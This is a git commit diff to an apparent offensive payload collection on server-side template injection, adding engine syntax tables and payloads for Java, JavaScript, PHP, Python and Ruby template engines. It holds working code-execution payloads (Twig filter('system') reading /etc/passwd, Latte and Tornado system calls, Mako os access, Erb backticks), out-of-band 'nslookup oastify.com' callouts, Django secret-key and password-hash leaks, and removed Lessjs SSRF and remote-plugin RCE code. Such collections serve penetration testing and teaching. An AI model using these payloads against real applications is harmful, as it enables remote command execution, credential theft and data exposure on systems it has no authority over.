Templating Libraries Tables

This commit is contained in:
Swissky 2024-11-02 17:42:18 +01:00
parent b29edefe09
commit d77ef2c4fc
7 changed files with 153 additions and 90 deletions

Binary file not shown.

After

Width:  |  Height:  |  Size: 784 KiB

View File

@ -2,6 +2,7 @@
## Summary ## Summary
- [Templating Libraries](#templating-libraries)
- [Java](#java) - [Java](#java)
- [Java - Basic injection](#java---basic-injection) - [Java - Basic injection](#java---basic-injection)
- [Java - Retrieve the systems environment variables](#java---retrieve-the-systems-environment-variables) - [Java - Retrieve the systems environment variables](#java---retrieve-the-systems-environment-variables)
@ -28,9 +29,24 @@
- [Groovy - Sandbox Bypass](#groovy---sandbox-bypass) - [Groovy - Sandbox Bypass](#groovy---sandbox-bypass)
## Templating Libraries
| Template Name | Payload Format |
| ------------ | --------- |
| Codepen | `#{}` |
| Freemarker | `${3*3}`, `#{3*3}`, `[=3*3]` |
| Groovy | `${9*9}` |
| Jinjava | `{{ }}` |
| Pebble | `{{ }}` |
| Spring | `*{7*7}` |
| Thymeleaf | `[[ ]]` |
| Velocity | `#set($X="") $X` |
## Java ## Java
### Java - Basic injection ### Java - Basic injection
> Multiple variable expressions can be used, if `${...}` doesn't work try `#{...}`, `*{...}`, `@{...}` or `~{...}`. > Multiple variable expressions can be used, if `${...}` doesn't work try `#{...}`, `*{...}`, `@{...}` or `~{...}`.
```java ```java
@ -154,6 +170,7 @@ Fixed by https://github.com/HubSpot/jinjava/pull/230
## Pebble ## Pebble
[Official website](https://pebbletemplates.io/) [Official website](https://pebbletemplates.io/)
> Pebble is a Java templating engine inspired by [Twig](./#twig) and similar to the Python [Jinja](./#jinja2) Template Engine syntax. It features templates inheritance and easy-to-read syntax, ships with built-in autoescaping for security, and includes integrated support for internationalization. > Pebble is a Java templating engine inspired by [Twig](./#twig) and similar to the Python [Jinja](./#jinja2) Template Engine syntax. It features templates inheritance and easy-to-read syntax, ships with built-in autoescaping for security, and includes integrated support for internationalization.
### Pebble - Basic injection ### Pebble - Basic injection
@ -188,6 +205,7 @@ New version of Pebble :
## Velocity ## Velocity
[Official website](https://velocity.apache.org/engine/1.7/user-guide.html) [Official website](https://velocity.apache.org/engine/1.7/user-guide.html)
> Velocity is a Java-based template engine. It permits web page designers to reference methods defined in Java code. > Velocity is a Java-based template engine. It permits web page designers to reference methods defined in Java code.
```python ```python

View File

@ -2,17 +2,33 @@
## Summary ## Summary
- [Templating Libraries](#templating-libraries)
- [Handlebars](#handlebars) - [Handlebars](#handlebars)
- [Handlebars - Command Execution](#handlebars---command-execution) - [Handlebars - Command Execution](#handlebars---command-execution)
- [Lessjs](#lessjs)
- [Lessjs - SSRF / LFI](#lessjs---ssrf--lfi)
- [Lessjs < v3 - Command Execution](#lessjs--v3---command-execution)
- [Lessjs Plugins](#lessjs-plugins)
- [Lodash](#Lodash) - [Lodash](#Lodash)
- [Lodash - Basic Injection](#lodash---basic-injection) - [Lodash - Basic Injection](#lodash---basic-injection)
- [Lodash - Command Execution](#lodash---command-execution) - [Lodash - Command Execution](#lodash---command-execution)
## Templating Libraries
| Template Name | Payload Format |
| ------------ | --------- |
| DotJS | `{{= }}` |
| DustJS | `{}` |
| EJS | `<% %>` |
| HandlebarsJS | `{{ }}` |
| HoganJS | `{{ }}` |
| Lodash | `{{= }}` |
| MustacheJS | `{{ }}` |
| NunjucksJS | `{{ }}` |
| PugJS | `#{}` |
| TwigJS | `{{ }}` |
| UnderscoreJS | `<% %>` |
| VelocityJS | `#=set($X="")$X` |
| VueJS | `{{ }}` |
## Handlebars ## Handlebars
[Official website](https://handlebarsjs.com/) [Official website](https://handlebarsjs.com/)
@ -44,63 +60,6 @@
--- ---
## Lessjs
[Official website](https://lesscss.org/)
> Less (which stands for Leaner Style Sheets) is a backwards-compatible language extension for CSS. This is the official documentation for Less, the language and Less.js, the JavaScript tool that converts your Less styles to CSS styles.
### Lessjs - SSRF / LFI
```less
@import (inline) "http://localhost";
// or
@import (inline) "/etc/passwd";
```
### Lessjs < v3 - Command Execution
```less
body {
color: `global.process.mainModule.require("child_process").execSync("id")`;
}
```
### Lessjs Plugins
Lessjs plugins can be remotely included and are composed of Javascript which gets executed when the Less is transpiled.
```less
// example local plugin usage
@plugin "plugin-2.7.js";
```
or
```less
// example remote plugin usage
@plugin "http://example.com/plugin-2.7.js"
```
version 2 example RCE plugin:
```javascript
functions.add('cmd', function(val) {
return `"${global.process.mainModule.require('child_process').execSync(val.value)}"`;
});
```
version 3 and above example RCE plugin
```javascript
//Vulnerable plugin (3.13.1)
registerPlugin({
install: function(less, pluginManager, functions) {
functions.add('cmd', function(val) {
return global.process.mainModule.require('child_process').execSync(val.value).toString();
});
}
})
```
---
## Lodash ## Lodash
[Official website](https://lodash.com/docs/4.17.15) [Official website](https://lodash.com/docs/4.17.15)

View File

@ -2,17 +2,33 @@
## Summary ## Summary
- [Templating Libraries](#templating-libraries)
- [Smarty](#smarty) - [Smarty](#smarty)
- [Twig](#twig) - [Twig](#twig)
- [Twig - Basic injection](#twig---basic-injection) - [Twig - Basic injection](#twig---basic-injection)
- [Twig - Template format](#twig---template-format) - [Twig - Template format](#twig---template-format)
- [Twig - Arbitrary File Reading](#twig---arbitrary-file-reading) - [Twig - Arbitrary File Reading](#twig---arbitrary-file-reading)
- [Twig - Code execution](#twig---code-execution) - [Twig - Code execution](#twig---code-execution)
- [Latte](#latte)
- [Latte - Basic injection](#latte---basic-injection)
- [Latte - Code execution](#latte---code-execution)
- [patTemplate](#pattemplate) - [patTemplate](#pattemplate)
- [PHPlib](#phplib-and-html_template_phplib) - [PHPlib](#phplib-and-html_template_phplib)
- [Plates](#plates) - [Plates](#plates)
## Templating Libraries
| Template Name | Payload Format |
| -------------- | --------- |
| Laravel Blade | `{{ }}` |
| Latte | `{var $X=""}{$X}` |
| Mustache | `{{ }}` |
| Plates | `<?= ?>` |
| Smarty | `{ }` |
| Twig | `{{ }}` |
## Smarty ## Smarty
[Official website](https://www.smarty.net/docs/en/) [Official website](https://www.smarty.net/docs/en/)
@ -78,6 +94,7 @@ $output = $twig > render (
{{['cat$IFS/etc/passwd']|filter('system')}} {{['cat$IFS/etc/passwd']|filter('system')}}
{{['id']|filter('passthru')}} {{['id']|filter('passthru')}}
{{['id']|map('passthru')}} {{['id']|map('passthru')}}
{{['nslookup oastify.com']|filter('system')}}
``` ```
Example injecting values to avoid using quotes for the filename (specify via OFFSET and LENGTH where the payload FILENAME is) Example injecting values to avoid using quotes for the filename (specify via OFFSET and LENGTH where the payload FILENAME is)
@ -95,6 +112,23 @@ email="{{app.request.query.filter(0,0,1024,{'options':'system'})}}"@attacker.tld
--- ---
## Latte
### Latte - Basic injection
```php
{var $X="POC"}{$X}
```
### Latte - Code execution
```php
{php system('nslookup oastify.com')}
```
---
## patTemplate ## patTemplate
> [patTemplate](https://github.com/wernerwa/pat-template) non-compiling PHP templating engine, that uses XML tags to divide a document into different parts > [patTemplate](https://github.com/wernerwa/pat-template) non-compiling PHP templating engine, that uses XML tags to divide a document into different parts

View File

@ -2,7 +2,14 @@
## Summary ## Summary
- [Templating Libraries](#templating-libraries)
- [Django](#django) - [Django](#django)
- [Django - Basic injection](#django---basic-injection)
- [Django - Cross-site scripting](#django---cross-site-scripting)
- [Django - Debug information leak](#django---debug-information-leak)
- [Django - Leaking app's Secret Key](#django---leaking-apps-secret-key)
- [Django - Admin Site URL leak](#django---admin-site-url-leak)
- [Django - Admin username and password hash leak](#django---admin-username-and-password-hash-leak)
- [Jinja2](#jinja2) - [Jinja2](#jinja2)
- [Jinja2 - Basic injection](#jinja2---basic-injection) - [Jinja2 - Basic injection](#jinja2---basic-injection)
- [Jinja2 - Template format](#jinja2---template-format) - [Jinja2 - Template format](#jinja2---template-format)
@ -11,21 +18,39 @@
- [Jinja2 - Dump all config variables](#jinja2---dump-all-config-variables) - [Jinja2 - Dump all config variables](#jinja2---dump-all-config-variables)
- [Jinja2 - Read remote file](#jinja2---read-remote-file) - [Jinja2 - Read remote file](#jinja2---read-remote-file)
- [Jinja2 - Write into remote file](#jinja2---write-into-remote-file) - [Jinja2 - Write into remote file](#jinja2---write-into-remote-file)
- [Jinja2 - Remote Code Execution](#jinja2---remote-code-execution) - [Jinja2 - Remote Command Execution](#jinja2---remote-command-execution)
- [Forcing output on blind RCE](#jinja2---forcing-output-on-blind-rce) - [Forcing output on blind RCE](#jinja2---forcing-output-on-blind-rce)
- [Exploit the SSTI by calling os.popen().read()](#exploit-the-ssti-by-calling-ospopenread) - [Exploit the SSTI by calling os.popen().read()](#exploit-the-ssti-by-calling-ospopenread)
- [Exploit the SSTI by calling subprocess.Popen](#exploit-the-ssti-by-calling-subprocesspopen) - [Exploit the SSTI by calling subprocess.Popen](#exploit-the-ssti-by-calling-subprocesspopen)
- [Exploit the SSTI by calling Popen without guessing the offset](#exploit-the-ssti-by-calling-popen-without-guessing-the-offset) - [Exploit the SSTI by calling Popen without guessing the offset](#exploit-the-ssti-by-calling-popen-without-guessing-the-offset)
- [Exploit the SSTI by writing an evil config file.](#exploit-the-ssti-by-writing-an-evil-config-file) - [Exploit the SSTI by writing an evil config file.](#exploit-the-ssti-by-writing-an-evil-config-file)
- [Jinja2 - Filter bypass](#jinja2---filter-bypass) - [Jinja2 - Filter bypass](#jinja2---filter-bypass)
- [Tornado](#tornado)
- [Tornado - Basic injection](#tornado---basic-injection)
- [Tornado - Remote Command Execution](#tornado---remote-command-execution)
- [Mako](#mako) - [Mako](#mako)
- [Direct access to os from TemplateNamespace:](#direct-access-to-os-from-templatenamespace) - [Mako - Remote Command Execution](#mako---remote-command-execution)
- [References](#references)
## Templating Libraries
| Template Name | Payload Format |
| ------------ | --------- |
| Bottle | `{{ }}` |
| Chameleon | `${ }` |
| Cheetah | `${ }` |
| Django | `{{ }}` |
| Jinja2 | `{{ }}` |
| Mako | `${ }` |
| Pystache | `{{ }}` |
| Tornado | `{{ }}` |
## Django ## Django
Django template language supports 2 rendering engines by default: Django Templates (DT) and Jinja2. Django Templates is much simpler engine. It does not allow calling of passed object functions and impact of SSTI in DT is often less severe than in Jinja2. Django template language supports 2 rendering engines by default: Django Templates (DT) and Jinja2. Django Templates is much simpler engine. It does not allow calling of passed object functions and impact of SSTI in DT is often less severe than in Jinja2.
### Django - Detection ### Django - Basic injection
```python ```python
{% csrf_token %} # Causes error with Jinja2 {% csrf_token %} # Causes error with Jinja2
@ -33,47 +58,34 @@ Django template language supports 2 rendering engines by default: Django Templat
ih0vr{{364|add:733}}d121r # Burp Payload -> ih0vr1097d121r ih0vr{{364|add:733}}d121r # Burp Payload -> ih0vr1097d121r
``` ```
### Django Templates for post-exploitation
```python ### Django - Cross-site scripting
# Variables
{{ variable }}
{{ variable.attr }}
# Filters
{{ value|length }}
# Tags
{% csrf_token %}
```
### Cross-site scripting
```python ```python
{{ '<script>alert(3)</script>' }} {{ '<script>alert(3)</script>' }}
{{ '<script>alert(3)</script>' | safe }} {{ '<script>alert(3)</script>' | safe }}
``` ```
### Debug information leak ### Django - Debug information leak
```python ```python
{% debug %} {% debug %}
``` ```
### Leaking apps Secret Key ### Django - Leaking apps Secret Key
```python ```python
{{ messages.storages.0.signer.key }} {{ messages.storages.0.signer.key }}
``` ```
### Admin Site URL leak ### Django - Admin Site URL leak
``` ```
{% include 'admin/base.html' %} {% include 'admin/base.html' %}
``` ```
### Admin username and password hash leak ### Django - Admin username and password hash leak
``` ```
@ -162,7 +174,7 @@ Access `__globals__` and `__builtins__`:
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }} {{ ''.__class__.__mro__[2].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }}
``` ```
### Jinja2 - Remote Code Execution ### Jinja2 - Remote Command Execution
Listen for connection Listen for connection
@ -295,11 +307,33 @@ Bypassing most common filters ('.','_','|join','[',']','mro' and 'base') by http
--- ---
## Tornado
### Tornado - Basic injection
```py
{{7*7}}
{{7*'7'}}
```
### Tornado - Remote Command Execution
```py
{{os.system('whoami')}}
{%import os%}{{os.system('nslookup oastify.com')}}
```
---
## Mako ## Mako
[Official website](https://www.makotemplates.org/) [Official website](https://www.makotemplates.org/)
> Mako is a template library written in Python. Conceptually, Mako is an embedded Python (i.e. Python Server Page) language, which refines the familiar ideas of componentized layout and inheritance to produce one of the most straightforward and flexible models available, while also maintaining close ties to Python calling and scoping semantics. > Mako is a template library written in Python. Conceptually, Mako is an embedded Python (i.e. Python Server Page) language, which refines the familiar ideas of componentized layout and inheritance to produce one of the most straightforward and flexible models available, while also maintaining close ties to Python calling and scoping semantics.
```python ```python
<% <%
import os import os
@ -308,7 +342,7 @@ x=os.popen('id').read()
${x} ${x}
``` ```
### Direct access to os from TemplateNamespace: ### Mako - Remote Command Execution
Any of these payloads allows direct access to the `os` module Any of these payloads allows direct access to the `os` module
@ -376,6 +410,7 @@ PoC :
<module 'os' from '/usr/local/lib/python3.10/os.py'> <module 'os' from '/usr/local/lib/python3.10/os.py'>
``` ```
Source [@podalirius_](https://twitter.com/podalirius_) : [https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/](https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/)
--- ## References
* [Python context free payloads in Mako templates - podalirius - August 26, 2021](https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/)

View File

@ -73,7 +73,8 @@ Based on the successful response, the attacker determines which template engine
* **Java**: Freemarker, Jinjava, Velocity, ... * **Java**: Freemarker, Jinjava, Velocity, ...
* **Ruby**: ERB, Slim, ... * **Ruby**: ERB, Slim, ...
[This post](https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756) summurize the syntax and detection method for most of the template engines for JavaScript, Python, Ruby, Java and PHP and how to differentiate between engines that use the same syntax. [The post "template-engines-injection-101" from @0xAwali](https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756) summarize the syntax and detection method for most of the template engines for JavaScript, Python, Ruby, Java and PHP and how to differentiate between engines that use the same syntax.
### Escalate to Code Execution ### Escalate to Code Execution
@ -106,3 +107,4 @@ Once the template engine is identified, the attacker injects more complex expres
* [Bug Writeup: RCE via SSTI on Spring Boot Error Page with Akamai WAF Bypass - Dec 4, 2022](https://h1pmnh.github.io/post/writeup_spring_el_waf_bypass/) * [Bug Writeup: RCE via SSTI on Spring Boot Error Page with Akamai WAF Bypass - Dec 4, 2022](https://h1pmnh.github.io/post/writeup_spring_el_waf_bypass/)
* [Leveraging the Spring Expression Language (SpEL) injection vulnerability ( a.k.a The Magic SpEL) to get RCE - Xenofon Vassilakopoulos - November 18, 2021](https://xen0vas.github.io/Leveraging-the-SpEL-Injection-Vulnerability-to-get-RCE/) * [Leveraging the Spring Expression Language (SpEL) injection vulnerability ( a.k.a The Magic SpEL) to get RCE - Xenofon Vassilakopoulos - November 18, 2021](https://xen0vas.github.io/Leveraging-the-SpEL-Injection-Vulnerability-to-get-RCE/)
* [Expression Language Injection - OWASP](https://owasp.org/www-community/vulnerabilities/Expression_Language_Injection) * [Expression Language Injection - OWASP](https://owasp.org/www-community/vulnerabilities/Expression_Language_Injection)
* [Template Engines Injection 101 - Mahmoud M. Awali - Nov 1, 2024](https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756)

View File

@ -2,11 +2,25 @@
## Summary ## Summary
- [Templating Libraries](#templating-libraries)
- [Ruby](#ruby) - [Ruby](#ruby)
- [Ruby - Basic injections](#ruby---basic-injections) - [Ruby - Basic injections](#ruby---basic-injections)
- [Ruby - Retrieve /etc/passwd](#ruby---retrieve-etcpasswd) - [Ruby - Retrieve /etc/passwd](#ruby---retrieve-etcpasswd)
- [Ruby - List files and directories](#ruby---list-files-and-directories) - [Ruby - List files and directories](#ruby---list-files-and-directories)
- [Ruby - Code execution](#ruby---code-execution) - [Ruby - Remote Command execution](#ruby---remote-Command-execution)
## Templating Libraries
| Template Name | Payload Format |
| ------------ | --------- |
| Erb | `<%= %>` |
| Erubi | `<%= %>` |
| Erubis | `<%= %>` |
| HAML | `#{ }` |
| Liquid | `{{ }}` |
| Mustache | `{{ }}` |
| Slim | `#{ }` |
## Ruby ## Ruby
@ -37,11 +51,12 @@
<%= Dir.entries('/') %> <%= Dir.entries('/') %>
``` ```
### Ruby - Code execution ### Ruby - Remote Command execution
Execute code using SSTI for **ERB** engine. Execute code using SSTI for **Erb**,**Erubi**,**Erubis** engine.
```ruby ```ruby
<%=(`nslookup oastify.com`)%>
<%= system('cat /etc/passwd') %> <%= system('cat /etc/passwd') %>
<%= `ls /` %> <%= `ls /` %>
<%= IO.popen('ls /').readlines() %> <%= IO.popen('ls /').readlines() %>